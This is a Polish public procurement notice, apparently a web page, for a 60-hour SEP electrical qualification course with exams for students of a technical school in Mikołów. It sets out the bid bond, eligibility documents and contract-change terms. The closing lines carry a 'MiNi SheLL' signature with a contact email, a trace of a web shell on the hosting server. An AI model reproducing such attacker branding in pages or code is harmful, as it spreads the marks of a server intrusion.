
3.  Termin realizacji:
I edycja - od daty podpisania umowy do 30 sierpnia 2013 r.
II edycja - od 1.IX.2013 do 30. IV.2014r. 


ZADANIE 4: Przeprowadzenie kursu Uprawnienia SEP w zakresie do 1kV wraz z egzaminem

Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu pn. Uprawnienia SEP w zakresie do 1kV dla 30 uczniów Zespołu Szkół Technicznych w Mikołowie  w wymiarze 60 godzin dla każdej z grup w latach szkolnych 2012-2013 i 2013-2014.

Kurs powinien uwzględniać wymagania  określone w Rozporządzeniu Ministra Gospodarki z dnia 16 marca 1998 r. w sprawie wymagań kwalifikacyjnych dla osób zajmujących się eksploatacją urządzeń, instalacji i sieci oraz trybu stwierdzania tych kwalifikacji, rodzajów instalacji i urządzeń, przy których eksploatacji wymagane jest posiadanie kwalifikacji, jednostek organizacyjnych, przy których powołuje się komisje kwalifikacyjne oraz wysokości opłat pobieranych za sprawdzenie kwalifikacji ( Dz. U. nr 59 z dnia 15 maja 1998 poz. 377).

1. W szczególności kurs powinien obejmować:
- przygotowanie teoretyczne do egzaminu w wymiarze 60h na grupę, 
- egzamin wewnętrzny
- egzamin państwowy umożliwiający otrzymanie świadectwa kwalifikacyjnego.

Liczba uczestników ogółem - 30
Liczba grup ogółem  - 4
Liczba godzin na grupę - 60 
Liczba godzin ogółem - 240 

godzina = godzina zegarowa
1 grupa zajęciowa = 15 osób 

Kurs dla 30 uczestników zostanie przeprowadzony w dwóch edycjach:
1) I edycja w roku szkolnym 2012-2013 obejmuje 1 grupę zajęciową - 15 osób
2) II edycja w roku szkolnym 2013-2014 obejmuje 1 grupę zajęciową - 15 osób 

2. Zamawiający wymaga, aby program zajęć był realizowany zgodnie z poniższymi wymaganiami:

2.1  Kurs powinien obejmować:program merytoryczny powinien obejmować zagadnienia: 
-	zarys wiadomości z podstaw elektrotechniki,
-	zasady budowy i warunki techniczne urządzeń elektroenergetycznych w zakresie ochrony przeciwpożarowej,
-	eksploatacja urządzeń elektroenergetycznych o napięciu do 1kV i powyżej,
-	bezpieczeństwo i higiena pracy,
-	zasady ratowania porażonych prądem elektrycznym,
-	przepisy ogólne z zakresu gospodarki paliwowo-energetycznej,
-	instrukcje eksploatacyjno-ruchowe i konserwacyjno-remontowe,
-	podstawowe zasady Prawa Energetycznego oraz aktualnie obowiązujące rozporządzenia Ministra Gosp. Pracy i Polityki Społecznej w tym zakresie,
-	podstawowe zasady Prawa Pracy, zwłaszcza w zakresie obowiązków pracodawcy oraz obowiązków i uprawnień pracowników, 
-	zasady doboru pracowników na stanowisko pracy w elektroenergetyce oraz zakres odpowiedzialności na poszczególnych stanowiskach pracy,
-	przeglądy techniczne  instalacji wynikające z ustawy Prawa Budowlanego,
-	warunki techniczne odbioru instalacji wg Prawa Budowlanego.
-	zarys wiadomości z podstaw elektrotechniki,
-	zasady budowy i warunki techniczne urządzeń elektroenergetycznych w zakresie ochrony przeciwpożarowej.

2.2 Zajęcia powinny się odbywać:
- od poniedziałku do soboty,
- w  ramach 12 spotkań po 5 h każde i być wsparte programami multimedialnymi,
- w siedzibie Zespołu Szkół Technicznych w Mikołowie, ul. Rybnicka 44, w odpowiednio do charakteru zajęć przystosowanych salach i  lub odpowiednio wyposażonej pracowni zapewnionej przez Wykonawcę. W przypadku zajęć poza szkołą ucznia, Wykonawca zapewnia transport uczestników z siedziby Zespołu Szkół Technicznych w Mikołowie, ul. Rybnicka 44 na miejsce zajęć  i z miejsca zajęć do siedziby szkoły.

2.3 Wykonawca zobowiązuje się do uzgodnienia z koordynatorem projektu szczegółowego harmonogramu zajęć dla poszczególnych grup w terminie 7 dni przed rozpoczęciem zajęć, natomiast ewentualnych korekt terminów zajęć nie później niż na 5 dni przed terminem zajęć danej grupy po uzyskaniu wcześniejszej akceptacji ze strony uczestników projektu. Harmonogram zajęć powinien być dostosowany do planu lekcji i harmonogramu zajęć dodatkowych w projekcie.

2.4 Podczas zajęć praktycznych wymagane jest, aby przy jednym stanowisku znajdował się wyłącznie jeden uczestnik szkolenia. Wykonawca powinien zapewnić uczestnikom szkolenia odpowiednie wyposażenie techniczne adekwatne do rodzaju szkolenia, odpowiadającego indywidualnym potrzebom szkoleniowym uczestnika. 

2.5 Wykonawca posiada uprawnienia do  prowadzenia działalności szkoleniowej i zapewni wykwalifikowana kadrę do przeprowadzenia kursu.

2.6 Wykonawca zapewni materiały dydaktyczne w postaci podręcznika lub skryptu wraz z płytami CD dotyczącymi obsługi urządzeń elektrycznych do 1 kV (po zakończeniu kursu materiały przechodzą na własność uczniów).
Komplet materiałów szkoleniowych Wykonawca dostarczy uczestnikom szkolenia oraz Zamawiającemu, najpóźniej w dniu rozpoczęcia szkolenia.

2.7 Wykonawca zapewni przeprowadzenie egzaminu państwowego Uprawnienia SEP w zakresie do 1kV dla każdego uczestnika, tj. 30 egzaminów (oraz po 1 ewentualnym egzaminie poprawkowym) oraz wydanie uczestnikom kursu zaświadczenia o ukończeniu kursu i zaświadczenia potwierdzającego posiadanie kwalifikacji zawodowych z wyszczególnieniem umiejętności i wiadomości nabytych w trakcie realizacji poszczególnych jednostek szkoleniowych z zakresu objętego kursem. Na zaświadczeniach powinny zostać umieszczone właściwe oznaczenia graficzne: logo i nazwy projektu, logo PO KL, UE, EFS wraz z tekstami opisującymi zaangażowanie środków UE w projekt.

2.8 W przypadku egzaminu poza szkołą ucznia, Wykonawca zapewnia transport uczestników z siedziby Zespołu Szkół Technicznych w Mikołowie, ul. Rybnicka 44 na miejsce egzaminu i z miejsca egzaminu do siedziby szkoły.

Wykonawca  w szczególności:
- rezerwuje termin egzaminu, 
- pokrywa koszt przygotowania ośrodka do egzaminu,
       - pokrywa w całości koszty egzaminu i ewentualnych poprawek (zakłada się 1 poprawkę dla każdego uczestnika),
- zapewnia otrzymanie po zdanym egzaminie świadectwa kwalifikacyjnego.

2.9.Termin realizacji:
I edycja - od daty podpisania umowy do 30 czerwca 2013 r.
II edycja - od 1.VII.2013 do 30. IV.2014r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium.
Każda oferta musi być zabezpieczona wadium w wysokości  2500 zł (słownie: dwatysiącepięćsetzłotych). 
Wadium wnosi się przed upływem terminu składania ofert. 
Wadium może być wnoszone w jednej lub kilku następujących formach:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty,  o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158  z późn. zm.)
Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy w ING Bank Śląski, na rachunek:
nr 03 1050 1214 1000 0022 9075 1375
Wadium musi być wniesione najpóźniej do dnia 04.02.2013 r. do godz.900.
Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym terminie znajdzie się, tj. zostanie zaksięgowane  na rachunku Zamawiającego. 
Pozostałe formy wadium należy złożyć do depozytu w kasie Starostwa Powiatowego, ul. Żwirki i Wigury 4a, 43-190 Mikołów, pok. 146, najpóźniej do dnia 04.02.2013 r. do godz.900.
W przypadku uchybienia ww. terminom, miejscom, treści lub formie wniesienia wadium, Zamawiający uzna, że wadium nie zostało skutecznie wniesione.
W przypadku wniesienia wadium w innej formie niż pieniądz w dokumencie wadialnym musi znaleźć się zapis, iż jest ono nieodwołalne, bezwarunkowe i płatne na pierwsze żądanie Zamawiającego. W gwarancji nie mogą być zawarte jakiekolwiek warunki ograniczające zakres odpowiedzialności gwarancyjnej. Dokument wadialny musi obejmować wszystkie przypadki opisane w art.46 ust.4a i ust.5 ustawy Prawo Zamówień Publicznych.

Zgodnie z art. 46 ust 1 ustawy Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust.4a art.46 ustawy. 
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 

Zgodnie z art. 46 ust. 2 ustawy Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy,  który wycofał ofertę przed upływem terminu składania ofert.

Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 

Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych  w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.;
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Dysponuje minimum dwiema osobami posiadającymi wykształcenie wyższe techniczne i przygotowanie pedagogiczne oraz doświadczenie w zakresie prowadzenia kursów/szkoleń z zakresu AutoCada tj. każda z tych osób przeprowadziła minimum 1 kurs/szkolenie z zakresu  AutoCada;
- Dysponuje minimum dwiema osobami posiadającymi wykształcenie wyższe techniczne i przygotowanie pedagogiczne oraz doświadczenie w zakresie prowadzenia kursów/szkoleń z zakresu programowania i obsługi obrabiarek sterowanych numerycznie tj. każda z tych osób przeprowadziła minimum 1 kurs/szkolenie z zakresu programowania i obsługi obrabiarek sterowanych numerycznie;
- Dysponuje minimum dwiema osobami posiadającymi wykształcenie wyższe techniczne i przygotowanie pedagogiczne oraz doświadczenie w zakresie prowadzenia kursów/szkoleń spawania w zakresie minimum  podstawowym tj. każda z tych osób przeprowadziła minimum 1 kurs/szkolenie spawania w zakresie minimum podstawowym;
- Dysponuje minimum jedną osobą posiadającą wykształcenie wyższe techniczne i przygotowanie pedagogiczne oraz doświadczenie w zakresie prowadzenia kursów/szkoleń  w zakresie  uzyskania uprawnień SEP tj.  przeprowadziła minimum 1 kurs/szkolenie ,którego zakres obejmował uzyskanie uprawnień SEP;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.
Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 

II. Inne warunki udziału w postępowaniu .
Brak podstaw do wykluczenia wykonawcy z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy Prawo Zamówień Publicznych.

Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w SIWZ i  zostanie przeprowadzona zgodnie z formułą - spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). wypełniony i podpisany formularz ofertowy stanowiący zał. nr 1  do SIWZ
2) Jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania wykonawcy do oferty należy załączyć pełnomocnictwo (upoważnienie)w formie oryginału podpisane przez osoby uprawnione do reprezentowania wykonawcy lub w formie kopii poświadczonej notarialnie.
3) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia pełnomocnictwo/upoważnieniem dla pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego. Pełnomocnictwo musi być w formie oryginału lub w formie kopii poświadczonej notarialnie. 
4) w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu , osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów Wykonawca zobowiązany jest do przedstawienia pisemnego zobowiązania tych podmiotów ( np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy ) do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej pod rygorem nieważności.
2. W związku z art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień (Dz. U. z 2010 r. Nr 113, poz. 759 i Nr 161, poz. 1078) Zamawiający przewiduje możliwość zmiany istotnych postanowień Umowy w stosunku do treści Oferty, w następujących okolicznościach:
a. konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
b. uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla stron,
c. w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na usługę,
d. wydłużenia terminu realizacji umowy w przypadku wystąpienia uzasadnionych okoliczności, których podstawą będą obiektywne przesłanki zaakceptowane przez Zamawiającego pod warunkiem uzyskania zgody na wydłużenie terminu realizacji projektu przez Instytucję, która przyznała środki na współfinansowanie zamówienia na zamówienie,
e. zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Zamawiającego na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu, w ramach którego realizowany jest przedmiot zamówienia, zmian wytycznych lub innych dokumentów programowych,
f. w przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontrolą stron niniejszej umowy, którego skutkom nie można zapobiec, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
g. w przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu realizacji jakiegokolwiek elementu usługi,
h. zmiany w kolejności i terminach wykonania przedmiotu zamówienia, na skutek zdarzeń losowych lub innych okoliczności,
i. zmian teleadresowych Stron Umowy.
2. Zmiana osób przewidzianych do nadzorowania przedmiotu umowy nie wymaga aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mikolowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Mikołowie, ul.Żwirki i Wigury 4a, 43-190 Mikołów, wejście B,parter, Biuro podawcze, osobiście lub za zaliczeniem pocztowym, cena 5 PLN plus koszt wysyłki..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Mikolowie, ul.Żwirki i Wigury 4a, 43-190 Mikołow, wejście B,parter, kancelaria - pokój nr 127..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 05.03.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Kompetencje TAK, Stereotypy NIE II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego w latach 2012-2014 jest  realizowany z Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego  współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com